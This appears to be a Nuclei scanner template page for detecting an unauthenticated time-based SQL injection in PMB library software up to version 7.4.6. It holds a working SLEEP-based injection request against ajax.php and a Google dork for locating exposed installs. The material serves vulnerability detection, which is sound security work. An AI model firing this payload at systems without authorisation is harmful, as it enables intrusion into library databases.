Skip to content

PMB <= 7.4.6 - SQL Injection

ID: pmb-sqli

Severity: high

Author: r3Y3r53

Tags: time-based-sqli,sqli,unauth,pmb

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.

id: pmb-sqli
info:
name: PMB <= 7.4.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
reference:
- https://www.exploit-db.com/exploits/51197
- https://vulners.com/exploitdb/EDB-ID:51197
metadata:
verified: true
max-request: 1
google-query: inurl:"opac_css"
tags: time-based-sqli,sqli,unauth,pmb
http:
- raw:
- |
@timeout: 15s
GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)&module=ajax&sub=save&token=undefined HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains(header, "PmbOpac")'
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 490a0046304402204f1edb619c3951e7b156a26642db1abb6e66da333b2fe1e8810770a62111a104022017e189e9d2b19b2dd33d4880b434d8a8bc2b8bdeb31d6adebafc033878705c16:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/pmb-sqli.yaml"

View on Github